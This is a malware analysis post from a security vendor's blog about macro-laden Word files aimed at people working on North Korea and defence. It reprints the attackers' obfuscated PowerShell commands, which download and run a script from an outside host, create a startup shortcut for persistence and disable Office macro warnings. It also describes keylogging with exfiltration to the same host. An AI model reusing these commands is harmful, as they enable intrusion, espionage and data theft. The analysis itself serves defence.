Malicious Word Files Targeting Specific Individuals Related to North Korea – ASEC BLOG

The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated on those related to the field. The filenames of the recently confirmed Word files are as follows:

Date Filename
July 18th (Format Style) Collecting Feedback of Experts on 2022 National Liberation Day Congratulatory Speech in Advance.doc
July 20th 0511_Meeting Proceeding of ***, Director of Ministry of Unification.doc
August 1st Asan Symposium 2022.doc
August 3rd Questionnaire (Researcher Hyeon).doc
August 4th Questionnaire (President Ahn).doc
August 11th (Plan) Session 6. Gyeonggi-do “Social Conversation for Peace and Unity” Promotion Plan.doc
August 16th Questionnaire (Doctor Jeong).doc
August 17th Discussion on Security of the Korean Peninsula and Strategy for North Korea (Mr. Kim).doc
Confirmed Filenames

The Word files contain malicious VBA macro codes, which are identical to type B introduced in AhnLab TIP with the title of <Overall Organizational Analysis Report of 2021 Kimsuky Attack Word Files>. The overall operation method is as follows:

Figure 1. Operation process

The macro code in the most recently discovered file titled Discussion on Security of the Korean Peninsula and Strategy for North Korea (Mr. Kim).doc is shown below.

Figure 2. Confirmed macro code

This macro code is a bit more obfuscated than the one covered in the previous post ‘APT Attack Attempts Using Word Documents to Target Specific Individuals‘. When the macro is run, it downloads additional scripts from ‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’ using PowerShell.

[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$j=$f.Replace(‘wra’,”);$u=$j.Replace(‘eilsdjfe’,’nloadstri’);$x=iex $u;iex $x
PowerShell command that is run
Figure 3. Script from hxxp://vjdif.mypressonline[.]com/ho/ng.txt

After this script uses the following commands to collect the user’s PC information, it encodes and saves the data in %APPDATA%AhnalbAhnlab.hwp, eventually sending it to ‘hxxp://vjdif.mypressonline[.]com/ho/post.php’.

Execution Command Collected Information
GetFolderPath(“Recent”) Recent folder path
dir $env:ProgramFiles ProgramFiles folder information
dir “C:Program Files (x86) C:Program Files (x86) folder information
systeminfo System info
tasklist List of running processes
Collected Information

If a registry named AhnlabUpdate exists in HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun, then the script does not collect information and immediately sends the log file. This is likely done to collect the keylogging data as it will use the same filename (Ahnlab.hwp) for log later in future keylogging attempts.

Once the data is sent, the script accesses hxxp://vjdif.mypressonline.com/ho/ng.down to download and run additional encoded scripts.

Figure 4. Created file
  • Creating shortcut

The additionally downloaded file ng.down is encoded and executed as a PowerShell background process through the Start-Job command. The script performs the following features:

It creates a file named HncSerial.log in the C:windowstemp folder saved with PowerShell commands. It also creates a shortcut for the file in the Startup folder so that the malware can continuously function.

[string]$a = {(New-Object Net.WebClient).Dokarysuntring(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$b=$a.replace(‘karysun’,’wnloadS’);$c=iex $b;iex $c
HncSerial.log file content

The following PowerShell command is run by the shortcut.

powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:windowstempHncSerial.log’);iex $x}
Execution Command
Figure 5. Created shortcut
  • Changing Office security settings

The script changes the Office security settings to run the macro at all times by changing the registry values.

New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice14.0WordSecurity -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice15.0WordSecurity -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice16.0WordSecurity -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice17.0WordSecurity -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice18.0WordSecurity -Name VBAWarnings -Value 1
New-ItemProperty -Path HKCU:SOFTWAREMicrosoftOffice19.0WordSecurity -Name VBAWarnings -Value 1
Commands for changing registry
  • Keylogging

User’s key inputs are saved to %APPDATA%AhnalbAhnlab.hwp. When a user starts their PC, the previously created shortcut is run and accesses hxxp://vjdif.mypressonline[.]com/ho/ng.txt to execute the PowerShell commands on that page, ultimately sending the saved information to hxxp://vjdif.mypressonline[.]com/ho/post.php.

Figure 6. Code related to keylogging

As Word files targeting individuals related to North Korea have been consistently discovered, users need to take extra caution. They should refrain from opening email attachments from unknown senders and files from unknown sources. Furthermore, they should ensure to maintain their security settings so that the malicious macros in Word files are not automatically executed.

[File Detection]
Downloader/DOC.Kimsuky
Trojan/PowerShell.FileUpload

[IOC]
cbafe2d6c3b36087220fe63129a1e611 (VBA)
hxxp://vjdif.mypressonline[.]com/ho/ng.txt
hxxp://vjdif.mypressonline[.]com/ho/ng.down
hxxp://vjdif.mypressonline[.]com/ho/post.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Source: https://asec.ahnlab.com/en/38182/